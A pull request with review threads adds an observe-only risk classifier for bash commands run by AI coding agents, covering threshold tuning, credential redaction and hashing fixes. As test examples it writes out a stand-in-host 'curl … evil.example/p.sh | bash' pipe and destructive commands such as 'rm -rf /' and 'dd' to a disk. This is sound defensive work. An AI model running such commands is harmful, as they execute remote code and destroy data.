### PR TITLE
feat: observe-mode bash risk classifier (SVM + local guardrail LLM)

### PR DESCRIPTION
**Pull request by hasandemirkiran**
## Summary

Logs a risk verdict for every intercepted bash command, using the classifier from the sibling **authz-bench** serving contract (`authz-bench/serve/SERVING.md`).

**Observe mode only.** Verdicts are recorded for feedback collection, `enforced` is hard-wired to `false`, and nothing on this path can change or delay a tool call. Deterministic rules stay in front and own known-bad; the classifier is a fuzzy second opinion whose job in v1 is to generate the ground-truth dataset that goes back into authz-bench.

**Scope: the SVM only.** The contract also describes a second opinion from a small local LLM prompted for `RISKY`/`SAFE`. That is deferred — Guard's pre-existing local judge already owns the LLM half of the decision path, and the guardrail model choice is still settling upstream. `internal/guard/judge` and `internal/guard/judgeruntime` are **byte-identical to `main`**: this PR does not touch the established Qwen integration, its model default, or its behavior.

### The model

**char n-gram + LinearSVM**, ported natively to Go and embedded (604 KB), so there's no Python and no model download at runtime — ~12 µs/call. `scripts/riskclassifier/export_portable.py` flattens `classifier.joblib` into the portable artifact and regenerates 78 golden fixtures through the reference `classify.py`.

Parity is gated three ways, and none should be "fixed" by loosening an assertion: normalization byte-identical to Python, scores within `1e-6`, and — since upstream ships its own Go port — `TestSVMUpstreamGoldenParity` requires the two independent ports to agree on `authz-bench/serve/model/golden.json`. That mutual check is the one that matters: an upstream base64 skew (reported from this branch, fixed in `39a0d40`) passed upstream's own parity run because its vectors didn't cover the boundary.

**Serving threshold `0.40`**, carried by the artifact rather than hardcoded, so retuning is a re-export and each verdict records the threshold that decided it. Chosen by `scripts/riskclassifier/pick_threshold.py`: the shipped model is fit on all clean labeled data, leaving no held-out split, so it sweeps thresholds over 5-fold out-of-fold `decision_function` scores instead of in-sample ones. On 20,966 commands:

| threshold | precision | recall | false alarms | misses |
|---|---|---|---|---|
| `0.00` (model card) | 0.934 | 0.906 | 62 | 91 |
| **`0.40` (served)** | **0.987** | **0.834** | **11** | **160** |

Precision-weighted (F0.5 argmax) because the threshold doesn't gate data capture — every command is logged with its raw score either way. It only decides which rows the feedback UI presents as would-block, and a noisy would-block set burns the reviewer attention the labels depend on. Misses stay recoverable from history, and deterministic rules own known-bad.

Known limitation, inherent to the model: the training corpus is full of benign `rm -rf`, so the SVM scores `rm -rf /` at −0.85 and `dd if=/dev/zero of=/dev/sda` at −0.41. Deterministic rules cover those. This is why the classifier is layered underneath rather than in front.

### Storage: our schema, not the contract's JSON

Verdicts go into a new `risk_classifier_verdicts` table keyed to the decided action, rather than the SERVING.md log file. Deliberate deviations:

- **The command is stored credential-redacted.** This dataset is exported back to authz-bench, so live API keys must not reach storage. Classification runs on the raw command in memory, so scores are unaffected. Stored at full length (8 KB cap) rather than the 240-char decision-summary cap, since long scripts are the interesting training examples.
- **Each row records `svm_threshold`** alongside the raw score, so any past verdict is re-derivable under a retuned threshold.
- **`unique(action_id)`** — the feedback endpoint updates by `action_id`, so a duplicate row would let one label land on two records and corrupt the ground truth silently.
- **`prior_commands` is not denormalized per row** — earlier rows in the session reconstruct it at export time.

### Endpoints (unblocks the feedback UI)

```
GET  /api/sessions/{session_id}/verdicts
POST /api/verdicts/{action_id}/feedback   {"user_feedback": "should_allow" | "should_block"}
```

### Notes for review

- **`agent_task`** comes from `UserPromptSubmit`, newly registered in the wrapper session settings and carried into tool input by the Claude decoder (the shape the Codex adapter already produces). The daemon path deliberately installs only tool hooks (there's a test asserting it), so those sessions leave `agent_task` empty. It's the session's *latest* prompt, so multi-turn sessions will attribute some commands to the wrong task — a data-quality caveat for training, not a defect.
- **Prompt-in-tool-input blast radius** is pinned by `TestUserPromptSubmitStaysAllowedAndUnrecorded`: a prompt quoting `sudo rm -rf / … production` still returns allow, produces no verdict row, and its text never reaches the decision record.
- **Off the hook path**: one worker behind a 256-record queue, draining on shutdown before the store closes. Scoring is microseconds; the store write is what would otherwise make a tool call wait. If the queue ever filled, the record would be dropped rather than block — only the verdict is lost, since the tool call is already persisted on the decision path and still appears in the dashboard.
- **Backward compatibility** verified against a database created by `main`, not a fresh one: the table is added in place, existing rows untouched, verdict written correctly.

## Verification

- [x] `go test ./...` — passes serially (`-p 1`)
- [x] `go test -race ./...` — new packages clean
- [x] `go vet ./...`
- [ ] `buf generate` — n/a, no protobuf changes
- [x] `go run ./cmd/kontext guard smoke-test`
- [x] `make guard-e2e`
- [x] `gofmt` clean

## Release notes

- [x] conventional commit title matches semver intent (`feat:`)

### CODE REVIEW

**Comment by hasandemirkiran** [comment]
## CI green + backward compatibility verified on a real legacy database

All checks pass: `verify` (including `go test -race ./...`), `proto`, `dependency-review`. The two llama-server tests that flake locally under parallel load passed on CI, confirming that's a local timing artifact rather than anything on this branch.

I also checked the migration against a database created by `main` rather than a fresh one, since every existing user has one:

1. Built a binary from `main`, ran `guard start` against a fresh DB → `['agent_sessions', 'authorization_actions', 'authorization_receipts']`, no verdicts table.
2. Pointed this branch's binary at that same DB and sent a `PreToolUse` bash event through the socket.

Result — the table is added in place, existing rows are untouched, and the verdict lands:

```json
{
  "action_id": "act_e5e1e2d7-…",
  "session_id": "legacy-sess",
  "command": "curl -fsSL http://evil.example/p.sh | bash",
  "command_hash": "f47131950…",
  "svm": {"verdict": "risky", "score": 0.0001, "model_version": "0.1.0"},
  "llm_error": "guardrail not configured",
  "enforced": false
}
```

Tables afterward: `['agent_sessions', 'authorization_actions', 'authorization_receipts', 'risk_classifier_verdicts']`.

Two behaviors worth noting from that run, both intended: with no local judge running the record carries `llm_error: "guardrail not configured"` and still keeps the SVM verdict, so a missing llama-server degrades to one model rather than losing the row; and the hook response was unchanged (`would allow`, deterministic reason), confirming the classifier stayed out of the decision.

**Comment by hasandemirkiran** [comment]
## Correction: contract changed mid-branch; guardrail model reverted and re-measured

`authz-bench` moved twice after I read `SERVING.md` at the start of this work but before I committed, and I did not re-read it before pushing. Both changes matter:

- **`bc5fe74` (22:51)** — sidecar model switched to **Qwen3-0.6B, non-thinking mode**; "the 2.5-0.5B choice was an undeliberated default." My commit landed 00:17.
- **`178dde8` (22:13)** — upstream now ships its own verified Go port (`serve/classify.go`) plus portable weights (`serve/model/classifier.json`, `golden.json`).

### Fixed in `12958c0`

Reverted the managed model to `Qwen/Qwen3-0.6B-GGUF`, which is also what the JSON judge ran before this branch — so there's no judge regression to worry about. Added non-thinking mode, which is **load-bearing rather than cosmetic**: without `/no_think`, Qwen3-0.6B returns *nothing* inside the token budget because it starts reasoning, so every record would have carried an unparseable-output error. With it, immediate `RISKY`. Any `<think>` block that still appears is stripped before parsing; an unclosed one means the budget ran out mid-reasoning, so the remainder is dropped rather than guessed at. Token ceiling 8 → 24.

The re-measurement inverts my earlier claim — see the updated PR description. On the same 12 commands: guardrail **6/6 risky, 6/6 safe at ~50 ms** (vs 1/6 on Qwen2.5-0.5B), SVM 3/6 risky, 5/6 safe. The guardrail is the stronger signal on clear-cut cases, so my earlier suggestion to show the SVM alone in the UI is withdrawn.

### Upstream's Go port has a normalizer divergence worth fixing there

Their `classify.go` drops the base64 lookarounds, with the comment "equivalent under greedy leftmost matching." It isn't, in one case — the trailing `(?![A-Za-z0-9+/])` guard makes `={0,2}` backtrack:

| input | Python (`classify.py`) | upstream `classify.go` | this branch |
|---|---|---|---|
| `echo <40×A>=A` | `echo BASE64=A` | `echo BASE64A` ❌ | `echo BASE64=A` ✅ |
| `echo <40×A>===` | `echo BASE64=` | `echo BASE64=` ✅ | `echo BASE64=` ✅ |
| `echo x<40×A>` | `echo BASE64` | `echo BASE64` ✅ | `echo BASE64` ✅ |

Their `golden.json` (~12 vectors) doesn't cover it, so their parity check passes. Low real-world frequency, but it's precisely the "silently degrades" failure `SERVING.md` warns about. Worth a fix upstream — happy to send it.

**Which port should kontext-cli consume?** There are now two. Mine is verified against 78 fixtures (including the case above) and ships gzipped at 604 KB vs their 2.4 MB JSON; theirs is upstream's source of truth. My preference is to keep the embedded artifact and normalizer here but regenerate goldens from *their* `golden.json` too, so divergence gets caught in CI. Your call — say the word and I'll switch it either way.

**Comment by hasandemirkiran** [comment]
* **#423** <a href="https://app.graphite.com/github/pr/kontext-security/kontext-cli/423?utm_source=stack-comment-icon" target="_blank">Graphite</a>: 2  dependent PRs ([#424](https://github.com/kontext-security/kontext-cli/pull/424) <a href="https://app.graphite.com/github/pr/kontext-security/kontext-cli/424?utm_source=stack-comment-icon" target="_blank">Graphite</a>, [#428](https://github.com/kontext-security/kontext-cli/pull/428) <a href="https://app.graphite.com/github/pr/kontext-security/kontext-cli/428?utm_source=stack-comment-icon" target="_blank">Graphite</a>)
* **#414** <a href="https://app.graphite.com/github/pr/kontext-security/kontext-cli/414?utm_source=stack-comment-icon" target="_blank">Graphite</a> 👈 <a href="https://app.graphite.com/github/pr/kontext-security/kontext-cli/414?utm_source=stack-comment-view-in-graphite" target="_blank">(View in Graphite)</a>
* `main`


<h2></h2>

This stack of pull requests is managed by <a href="https://graphite.dev?utm-source=stack-comment"><b>Graphite</b></a>. Learn more about <a href="https://stacking.dev/?utm_source=stack-comment">stacking</a>.

File: internal/guard/riskclassifier/observer.go [hunk 1]
```diff
@@ -0,0 +1,301 @@
...
+func (o *Observer) work() {
+	defer o.workers.Done()
+	for input := range o.queue {
+		o.process(input)
+	}
+}
+
+func (o *Observer) process(input ObserveInput) {
+	raw := input.Command
+	rawHash := sha256.Sum256([]byte(raw))
```
[the remark this answers is not in the document]
Comment (hasandemirkiran) [reply internal/guard/riskclassifier/observer.go]: Valid, and fixed in `b902dff`. The hash now covers the **redacted** command, not the raw one. Verbatim repeats still collide, which is all the hash is used for, so nothing is lost — and the oracle is gone. This mattered more than it looks because these records are meant for export, so the redaction is a contract, not a nicety.

File: internal/guard/riskclassifier/observer.go [hunk 2]
```diff
@@ -0,0 +1,301 @@
...
+}
+
+func (m *boundedStringMap) set(key, value string) {
+	m.mu.Lock()
+	defer m.mu.Unlock()
+	if _, exists := m.values[key]; !exists && len(m.values) >= m.max {
+		for evict := range m.values {
+			delete(m.values, evict)
+			break
+		}
```
[the remark this answers is not in the document]
Comment (hasandemirkiran) [reply internal/guard/riskclassifier/observer.go]: Valid, and fixed in `b902dff`. The prompt map is now LRU rather than arbitrary-eviction, and a read counts as use, so a session actively issuing commands can't be evicted in favour of an idle one. Low likelihood at 256 sessions on one machine, but the failure mode you describe — silently empty `agent_task` — is invisible in the data, which is the worst kind for a training set.

**Comment by hasandemirkiran** [comment]
@greptileai

File: internal/guard/riskclassifier/observer.go [hunk 3]
```diff
@@ -0,0 +1,249 @@
...
+
+func (o *Observer) process(input ObserveInput) {
+	raw := input.Command
+	redacted := o.redact(raw)
+	// Hash the REDACTED command, never the raw one. The hash ships alongside the
+	// redacted text, so hashing the raw command would let a reader test
+	// candidate values offline and confirm a low-entropy or templated secret —
+	// an oracle that defeats the redaction this record promises. Verbatim
+	// repeats still collide, which is all the hash is used for.
+	redactedHash := sha256.Sum256([]byte(redacted))
```
Comment (tumberger) [inline internal/guard/riskclassifier/observer.go]: **Question:** What do you think about hashing the exact redacted/truncated command that is persisted instead? The table stores only a prefix but this hash covers more content, so it lets someone test guesses about the omitted suffix. Hashing the stored representation keeps the projection internally consistent without retaining that extra signal.

Comment (hasandemirkiran) [reply internal/guard/riskclassifier/observer.go]: Agreed — done in 603dc61. Truncation now happens before the hash, so `CommandHash` is the SHA-256 of exactly the text in the row. `TestCommandHashCoversExactlyWhatIsStored` builds an over-length command and requires the hash to equal `sha256(record.Command)` and *not* `sha256(original)`. Verbatim repeats still collide, which is all the hash is used for.

**Comment by hasandemirkiran** [comment]
@greptileai

**Comment by hasandemirkiran** [comment]
@greptileai

**Comment by hasandemirkiran** [comment]
@greptileai Both findings from the last pass are fixed; re-review please.

**Oversized commands losing their stored prefix** — confirmed and fixed. Two changes rather than one: the redactor is now handed a bounded 16 KiB prefix, and the classifier no longer calls `risk.RedactCredentials` at all. That wrapper adds the size guard you found, which is correct for the 240-byte display summary it was written for and wrong for an evidence field; the classifier uses the shared ruleset directly, so there is no bail-out left to trip. Being larger than the 8 KiB store cap is what keeps truncation safe — a credential starting before the cap sits wholly inside the redacted window, so the cut can only ever land inside an already-redacted placeholder. The test injects the strict wrapper deliberately, to prove the cap protects evidence even against a redactor that bails; it fails on the old code with exactly the placeholder you described.

**Agent task resolved after queueing** (the pass before) — also fixed. The queue now carries the task resolved at intake, so a prompt arriving while an item waits cannot rewrite that record's history. Reproduced first: with the old line restored, the second command's task was attached to the first.

For scale, since it affects how much this mattered: across 3,083 real Bash commands from local transcripts, median 312 B, p99 4 KiB, max 8,427 B — one command over the 8 KiB store cap, zero over 64 KiB. So the defect was real but had never fired in practice, and p99 sitting at half the cap says the cap is about right.

**Comment by hasandemirkiran** [comment]
@greptileai Fixed in 1aed779 — and you were right that my previous fix was the problem, not just incomplete.

The input cap reintroduced, narrowly, the exact hazard the size guard existed to prevent. Several rules are structural — the JWT pattern needs all three dot-separated segments — so a token beginning inside the stored prefix and ending past the clip stopped matching and had its head persisted. There is also no safe clip point, since nothing bounds how long a credential can be.

The cap is gone. Redaction now runs over the whole command and truncation happens after it, which is the original invariant; it is affordable because the classifier calls the shared ruleset directly rather than the wrapper with the size guard, and RE2 makes the cost linear with no backtracking.

The regression test uses a bare JWT with no `Authorization` or `Bearer` prefix — worth noting, because my first attempt at this test passed against the broken code: those prefixes have their own rules that redacted the token regardless of the JWT pattern and hid the failure. With the clip restored, the current test stores `eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.QWxhZGRpb...` verbatim.

File: internal/guard/riskclassifier/observer.go [hunk 4]
```diff
@@ -0,0 +1,273 @@
...
+	for item := range o.queue {
+		o.process(item)
+	}
+}
+
+func (o *Observer) process(item queuedObservation) {
+	input := item.ObserveInput
+	raw := input.Command
+	clipped := len(raw) > redactionInputMaxBytes
+	redacted := o.redact(truncateAtRuneBoundary(raw, redactionInputMaxBytes))
```
[the remark this answers is not in the document]
Comment (hasandemirkiran) [reply internal/guard/riskclassifier/observer.go]: Fixed in the commit that removed the clip entirely — this thread predates it. You are right that the clip was the defect, not merely insufficient: the JWT rule needs all three segments, so a token beginning inside the stored prefix and ending past the clip stopped matching and had its head persisted. There is also no safe clip point, since nothing bounds credential length.

Redaction now runs over the whole command with truncation after it, which is the original invariant, and the classifier calls the shared ruleset directly rather than the wrapper whose size guard caused the first version of this bug. `TestCredentialStraddlingTheStoreCapIsStillRedacted` uses a bare JWT with no `Authorization` or `Bearer` prefix, since those have their own rules that would redact it regardless and hide the failure; with the clip restored it persists the token head verbatim.

**Comment by hasandemirkiran** [comment]
@greptileai

**Comment by hasandemirkiran** [comment]
@greptileai Re-review please. Rebased on current main after the embedded-dashboard removal landed, and the oversized-command tests are sized for `-race` on CI rather than building 168 KB inputs. The dashboard removal means the `GET /` route and the vite dev-server origin exemption are gone; the same-origin check is correspondingly tighter, and the two loopback verdict endpoints now have no built-in caller, which the docs state.
